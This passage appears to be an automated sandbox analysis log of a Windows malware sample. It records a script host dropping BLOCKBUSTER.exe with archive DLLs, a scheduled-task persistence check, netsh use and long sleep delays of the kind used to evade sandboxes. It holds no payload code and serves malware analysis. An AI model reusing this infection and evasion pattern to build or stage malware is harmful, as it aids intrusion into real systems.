Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: zipfldr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: apphelp.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: version.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: mpr.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wininet.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wsock32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: winmm.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: uxtheme.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: devobj.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: msasn1.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: c_is2022.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: c_g18030.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: c_gsm7.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: c_iscii.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: netapi32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: netutils.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: olepro32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: msimg32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: kernel.appcore.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: windows.storage.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wldp.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: unrar.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: 7zxa.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: winhttp.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: shfolder.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: magnification.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: urlmon.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: iphlpapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: iertutil.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: srvcli.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wtsapi32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: d3d9.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: dwmapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: security.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: secur32.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: sspicli.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: winsta.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wkscli.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: cscapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: oleacc.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: textshaping.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: mlang.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: textinputframework.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: coreuicomponents.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: coremessaging.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: ntmarta.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wintypes.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wintypes.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: wintypes.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: propsys.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: profapi.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: edputil.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: windows.staterepositoryps.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: appresolver.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: bcp47langs.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: slc.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: userenv.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: sppc.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: onecorecommonproxystub.dll
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\wscript.exe File created: C:\_6720bdf2272bc\7zxa.dll
Source: C:\Windows\SysWOW64\wscript.exe File created: C:\_6720bdf2272bc\unrar.dll
Source: C:\Windows\SysWOW64\wscript.exe File created: C:\_6720bdf2272bc\BLOCKBUSTER.exe

Boot Survival

Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Thread delayed: delay time: 1200000
